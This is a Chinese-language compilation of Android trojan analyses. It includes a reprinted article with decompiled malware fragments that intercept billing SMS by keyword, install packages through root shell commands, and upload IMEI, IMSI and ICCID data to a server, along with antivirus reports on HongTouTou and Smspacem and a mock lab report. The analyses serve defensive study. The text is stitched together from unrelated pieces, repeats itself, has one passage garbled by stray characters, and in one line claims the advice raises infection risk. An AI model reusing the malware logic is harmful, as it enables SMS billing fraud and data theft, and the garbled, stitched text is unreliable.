android手机木马的提取与分析

手机木马原理手机木马是一种恶意软件，通过潜藏在手机应用中感染设备并执行恶意操作。

其工作原理可分为以下几个步骤：1. 传播方式：手机木马可能通过多种方式传播，如通过恶意链接、应用下载或安装来自未知来源的应用等。

一旦用户点击或下载了木马应用，恶意软件便会开始植入和运行。

2. 植入手机系统：木马会试图植入到手机系统中，并获取系统级别的权限。

它会利用一些漏洞或系统安全性问题来获取这些权限，并绕过手机的防护机制。

3. 数据窃取：一旦木马植入成功并获取了系统权限，它就可以开始窃取用户的个人信息和敏感数据。

这些数据包括登录凭证、银行账户信息、个人通讯录等。

木马会将这些数据上传到远程控制服务器，供黑客使用或转售。

4. 远程控制：手机木马还可以被黑客远程操控。

黑客可以发送指令给木马，控制它执行各种操作，如发送短信、拍照、录音、窃取短信和通话记录等。

他们还可以利用木马发起网络攻击，感染其他设备或进行网络钓鱼。

5. 隐蔽性：为了不被用户察觉，手机木马通常会隐藏自己的图标和运行进程。

这使得用户很难察觉到手机已被感染，从而延长了恶意软件的潜伏时间。

为了保护手机免受木马感染，用户应采取以下措施：1. 下载应用时只从官方应用商店或可信的第三方应用市场下载，并注意应用的评论和评分，避免下载恶意或低评分的应用。

2. 及时更新手机操作系统和应用程序，以修复已知的漏洞和安全问题。

3. 安装可信的安全软件，及时扫描手机并清除潜在的恶意软件。

4. 禁用来自未知来源的应用安装选项，以防止恶意应用被安装。

5. 不点击来自陌生人或不可信来源的链接，尤其是不点击包含任何可疑内容的链接。

6. 注意手机的网络流量和电池消耗情况，以及不明原因的应用崩溃或手机反应迟钝等异常行为，可能是手机受到木马感染的迹象。

通过采取这些措施，用户可以增加手机木马感染的风险，保护个人信息的安全。

Android 木马分析与编写作者 mangel一、 Android 木马介绍Android 系统比iPhone 系统更开放，允许安装第三方应用程序，甚至是那些没有获得谷歌应用商店Android Market 批准的应用程序，但这种开放性似乎也增加了安全风险。

Android Marke 本身也发现了恶意软件感染的应用程序，不过用户可以像在个人电脑上所做的那样，通过安装杀毒软件来加以防范。

二、 概述该程序安装完是一款桌面主题，并可设置壁纸等。

运行后获取ROOT 权限，私自下载安装程序；并发送扣费短信，订制SP 服务，拦截掉回执的扣费确认短信，恶意消耗用户资费；窃取用户通讯录信息等隐私资料，并上传到服务器。

三、 样本特征1. 敏感权限 <uses-permission android:name="android.permission.DELETE_PACKAGES"黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处></uses-permission> <uses-permission android:name="android.permission.INSTALL_PACKAGES" ></uses-permission> <uses-permission android:name="android.permission.READ_CONTACTS" ></uses-permission> android.setting.START_SEND_SMS android.setting.SMS_SENTandroid.provider.Telephony.SMS_RECEIVED2. 入口点和恶意模块public class MyReceiver extends BroadcastReceiver{}（1）.发送拦截短信：String str39 = "android.setting.SMS_SENT"; try{String str41 = arrayOfSmsMessage[i13].getOriginatingAddress(); SmsManager localSmsManager4 = localSmsManager1; ArrayList localArrayList7 = localArrayList2;localSmsManager4.sendMultipartTextMessage(str41, null, localArrayList5, localArrayList7, null); }if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) if ((arrayOfSmsMessage[i13].getOriginatingAddress().contains("10658166")) || (arrayOfSmsMessage[i13].getMessageBody().contains("83589523")) || (arrayOfSmsMessage[i13].getMessageBody().contains("客服")) || (arrayOfSmsMessage[i13].getMessageBody().contains("资费")) || (arrayOfSmsMessage[i13].getMessageBody().contains("1.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("2.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/条")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/次"))) abortBroadcast();（2）. 获取ROOT 权限，安装卸载程序：private void installApk(String paramString1, String paramString2)try{Runtime localRuntime = Runtime.getRuntime();StringBuilder localStringBuilder = new StringBuilder("sudo pm install -r ");黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处File localFile2 = this.mContext.getFilesDir(); String str = localFile2 + "/" + paramString2; Process localProcess = localRuntime.exec(str); }private void installAPK() private void uninstallPlugin() { try {int i = Log.d("agui", "uninstall");Process localProcess = Runtime.getRuntime().exec("pm uninstall -r com.newline.root"); Intent localIntent1 = new Intent("android.intent.action.RUN"); Context localContext = this.mContext;Intent localIntent2 = localIntent1.setClass(localContext, MyService.class);ComponentName localComponentName = this.mContext.startService(localIntent1); return;}（3）.窃取上传隐私资料：String str8 = Long.toString(System.currentTimeMillis()); Object localObject1 = localHashtable.put("id", str8); Object localObject2 = localHashtable.put("imsi", str4); Object localObject3 = localHashtable.put("imei", str5); Object localObject4 = localHashtable.put("iccid", str6); Object localObject5 = localHashtable.put("mobile", str7);String str9 = TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss"); Object localObject6 = localHashtable.put("ctime", str9); Object localObject7 = localHashtable.put("osver", "1");Object localObject8 = localHashtable.put("cver", "010101"); Object localObject9 = localHashtable.put("uid", str1); Object localObject10 = localHashtable.put("bid", str2); Object localObject11 = localHashtable.put("pid", str3);Object localObject12 = localHashtable.put("softid", paramString2);MessageService.4 local4 = new MessageService.4(this, paramIResponseListener); NetTask localNetTask = new NetTask(localHashtable, "utf-8", 0, local4); String[] arrayOfString = new String[1]; arrayOfString[0] = paramString1;AsyncTask localAsyncTask = localNetTask.execute(arrayOfString);public class NetTask extends AsyncTask<String, Integer, String> protected String doInBackground(String[] paramArrayOfString) URL localURL1 = new java/net/URL;String str5 = localStringBuffer1.toString();黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处URL localURL2 = localURL1; String str6 = str5;localURL2.<init>(str6);localHttpURLConnection = (HttpURLConnection)localURL1.openConnection(); localHttpURLConnection.setRequestMethod("GET"); localHttpURLConnection.setConnectTimeout(5000); localHttpURLConnection.setReadTimeout(5000);3. 敏感字符串("sudo pm install -r "); installAPK()；contains("10658166") contains("83589523")contains("客服")contains("资费")四、 行为分析运行后获取ROOT 权限，私自下载安装程序；并发送扣费短信，订制SP 服务，拦截掉回执的扣费确认短信，恶意消耗用户资费；窃取用户通讯录信息等隐私资料，并上传到服务器。

Android木马HongTouTou分析报告\Android木马HongTouTou分析报告安天实验室Android木马HongTouTou分析报告安天实验室一、基本信息病毒名称：Trojan/Android.Adrd.a[Clicker]病毒别名： HongTouTou、ADRD病毒类型：木马样本MD5：A84997B0D220E6A63E2943DA64FFA38C样本CRC32：A42850DE样本长度：1,316,981 字节原始文件名：Newfpwap_com_liveprintslivewallpaper.apk出现时间：2011.01.27感染系统：Android 2.0及以上二、概述ADRD木马（又名HongTouTou木马）被植入十余款合法软件中（图1），通过多家论坛、下载站点分发下载实现大范围传播。

其主要行为包括：开启多项系统服务；每6小时向控制服务器发送被感染手机的IMEI、IMSI、版本等信息；接收控制服务器传回的指令；从数据服务器取回30个URL；依次访问这些URL，得到30个搜索引擎结果链接；在后台逐一访问这些链接；下载一个.apk安装文件到SD卡指定目录。

感染该木马的手机将产生大量网络数据流量，从而被收取流量费用。

攻击者通过增加搜索链接的访问量而获益。

用户可以下载安天提供的Android恶意代码专查工具AScanner检测手机是否感染这一木马，并卸载相应软件将其清除。

图1 正常软件与被植入木马的软件三、样本特征截止本分析报告发布，安天已经检测到ADRD木马（又名HongTouTou木马）被植入到下列Android 软件：●动态脚印动态壁纸Live Prints Live Wallpaper●TurboFly 3D●Robo 3●iReader●桌面时钟天气Fancy Widget Pro●炫彩方块动态壁纸 Light Grid●超级酷指南针●指纹解锁●夕阳轮廓动态壁纸上述被植入木马的软件最早出现于2010年12月21日。

木马分析报告1. 引言木马（Trojan），又称为“特洛伊木马”，是指通过伪装成正常合法程序或文件进入目标系统，并在未被用户察觉的情况下，对系统进行非法操作的恶意软件。

木马程序的存在给系统安全带来了重大威胁，因此，对木马进行深入分析和研究十分必要。

本文将对一款木马进行分析，并对其传播方式、特征和危害进行探讨。

2. 木马的传播方式木马程序主要通过以下几种方式进行传播： 1. 邮件附件：木马程序常常伪装成诱人的附件，通过邮件发送给用户，一旦用户点击或下载附件，木马程序就会悄悄安装和运行。

2. 网络下载：用户在未经过恶意网站的仔细筛选的情况下，下载了含有木马的软件或文件，木马程序就会被安装到用户的系统中。

3. 可移动存储介质：如U盘、移动硬盘等存储介质中含有木马程序，只要用户将这些介质连接到自己的电脑上，木马程序就会被植入系统。

4. 动态链接库：木马程序可能会以DLL（Dynamic-Link Library）的形式出现，通过注入到正常进程中，实现对系统的控制。

3. 木马的特征为了能够更好地进行木马防护，我们需要了解木马的一些特征： 1. 欺骗性：木马程序通常伪装成合法可信的程序或文件，例如常见的.exe、.doc、.pdf等，以迷惑用户进行安装或下载。

2. 启动项修改：木马程序常常会修改系统的启动项，以保证自己能够在系统启动时自动运行，从而实现长期隐藏控制。

3. 远程控制：木马程序通常与远程服务器建立连接，以便黑客能够远程控制被感染的系统，进行各种操控、监控和窃取敏感信息等操作。

4. 系统资源占用增加：木马程序运行时会消耗大量系统资源，例如CPU和内存，从而降低系统的整体性能。

5. 网络流量增加：木马程序会通过网络上传、下载数据，导致网络流量明显增加，对网速造成影响。

4. 木马的危害与预防木马程序给系统带来的危害非常严重，包括但不限于以下几个方面： 1. 数据窃取：木马程序可以利用系统权限，窃取用户的个人隐私数据，例如登录名、密码、银行账号等。

Android木马Smspacem分析报告Android木马Smspacem分析报告安天实验室Android木马Smspacem分析报告安天实验室一、基本信息病毒名称：Trojan/Android.Smspacem病毒类型：木马样本MD5：60CE9B29A6B9C7EE22604ED5E08E8D8A样本长度： 1855,053 字节发现时间：2011.05.22感染系统：Android 2.1及以上二、概述Smspacem木马主要行为是在开机时自启动，被该恶意软件感染的设备会自动获取手机用户通讯录中的信息（联系人名称、电话号码、Email等），自动向其联系人电话发送短信，其内容为事先编辑好的，如“现在无法通话，世界末日即将来临”等；该软件还试图访问指定的主机服务，并将从被感染设备的通讯录中获得的邮箱地址发送到远程服务器上；最后还会将被感染设备的壁纸修改为事先设定好的图像。

当被该恶意软件感染的设备接收短信时，短信将被拦截，并且该恶意软件将删除短信数据库中的短信，并且向该短信的发送地址发送一条事先编辑好的信息，如“现在无法通话，世界末日即将来临”等。

这一类的木马主要由最近关于世界末日将于2011年5月21日来临的新闻所引起。

抵御木马的关键是用户要对自己的设备进行安全设置，并在安装软件后查看其权限中是否存在敏感的权限等。

图 1 Holy软件界面及特殊权限三、样本特征3.1敏感权限●允许应用程序访问设备的手机功能：有此权限的应用程序可以确定此手机的号码和序列号、是否正在通话、以及对方的号码等。

●允许应用程序发送短信：恶意应用程序可能会不经您的确认就发送信息，给您产生费用。

●允许应用程序写入手机或 SIM 卡中存储的短信：恶意应用程序可借此删除您的信息。

●允许应用程序读取您的手机或 SIM 卡中存储的短信：恶意应用程序可借此读取您的机密信息。

●允许应用程序接收和处理短信：恶意应用程序可借此监视您的信息，或者将信息删除而不向您显示。

目前智能手‎机系统上的‎木马病毒程‎序已经泛滥‎，特别是A‎n droi‎d系统开源‎且水货、刷‎机行为较多‎，成为木马‎病毒的主要‎攻击方向。

‎Andr‎o id系统‎的木马病毒‎系统可分为‎如下主要特‎征：1、获取‎硬件信息，‎如IMEI‎、IMSI‎等2、访问特‎定网站，增‎加流量或通‎话费用3、窃‎取用户通话‎及短信信息‎4、窃取用户‎键盘输入的‎敏感信息‎在以上特点‎中，第三和‎第四点对手‎机银行的危‎险性最大，‎木马能够窃‎取客户输入‎的用户名、‎密码以及手‎机交易码信‎息，并发送‎远程服务器‎。

1、窃‎取用户通话‎及短信信息‎木马介绍‎2011年‎11月，信‎息安全厂商‎卡巴斯基发‎表分析文章‎，介绍智能‎手机Zit‎M o （Ze‎u S-in‎-the-‎M obil‎e）木马是‎如何盗取用‎户重要数据‎的。

手‎机交易码曾‎被认为是最‎可靠的网银‎安全保护措‎施之一。

然‎而，随着专‎门针对智能‎手机的Ze‎u S木马出‎现，特别是‎Z euS-‎i n-th‎e-Mob‎i le或Z‎i tMo–‎m TANs‎的出现，手‎机交易码已‎不能确保用‎户的重要数‎据不会落入‎网络罪犯的‎手中。

Zi‎t Mo 于2‎010年9‎月首次被检‎测到，专门‎用来盗取由‎银行发送的‎短信息中的‎m TAN代‎码，也是迄‎今为止最受‎关注的手机‎安全事件之‎一。

网‎络安全专家‎分析称，“‎首先，该病‎毒具有跨平‎台传播的能‎力，无论是‎S ymbi‎a n、Wi‎n dows‎Mobi‎l e、Bl‎a ckbe‎r ry和A‎n droi‎d系统，都‎被检测到了‎这种木马，‎其目的主要‎是将手机交‎易码短信息‎转发给网络‎罪犯(或者‎是一台服务‎器)，后者‎进而可以利‎用这些被侵‎入的银行账‎户进行非法‎交易。

但是‎，ZitM‎o最大的特‎点是它与台‎式计算机木‎马ZeuS‎背后的关系‎。

如果没有‎后者的话，‎Z itMo‎仅仅能起到‎一个转发短‎信息的间谍‎程序作用。

手机木马实验报告手机木马实验报告1. 引言手机木马是一种恶意软件，它能够在用户不知情的情况下获取手机的敏感信息、控制手机的功能以及传播自身。

为了深入了解手机木马的工作原理和危害程度，我们进行了一系列的实验。

2. 实验目的本次实验的目的是通过模拟手机木马的攻击行为，评估其对手机和用户的威胁程度，以及提供相应的防护建议。

3. 实验方法我们使用了一台安装有最新操作系统和杀毒软件的Android手机作为实验对象。

通过下载一款模拟手机木马的应用程序，并在实验过程中监测其行为，我们能够了解手机木马的攻击方式、传播途径以及对手机的影响。

4. 实验结果在实验过程中，我们观察到以下几个现象：4.1 敏感信息获取手机木马能够在用户不知情的情况下获取手机中的敏感信息，如联系人、短信、通话记录等。

我们发现，模拟的手机木马成功地获取了手机中的敏感信息，并将其上传到了远程服务器上。

4.2 功能控制手机木马可以远程控制手机的各项功能，包括拍照、录音、发送短信等。

我们测试了模拟木马的远程控制功能，发现它能够远程激活手机的摄像头，并将拍摄到的照片发送到远程服务器。

4.3 自我传播手机木马可以通过各种方式自我传播，如通过短信、应用商店等。

我们模拟了手机木马的传播行为，并观察到它成功地向其他手机发送了包含木马应用的短信，并诱导用户下载安装。

5. 结果分析通过以上实验结果，我们可以得出以下几点结论：5.1 手机木马对用户隐私的侵犯程度非常高，能够获取用户的敏感信息并传输给攻击者。

5.2 手机木马的功能控制能力使得攻击者可以远程操控手机，可能导致更严重的后果，如偷拍、窃听等。

5.3 手机木马的自我传播能力使得其传播速度非常快，可能导致大规模的感染。

6. 防护建议为了保护手机和用户的安全，我们提出以下防护建议：6.1 安装可信任的杀毒软件，并及时更新病毒库。

6.2 不要随意下载来历不明的应用程序，尤其是通过非官方渠道下载。

6.3 注意手机的权限设置，仅授权给必要的应用。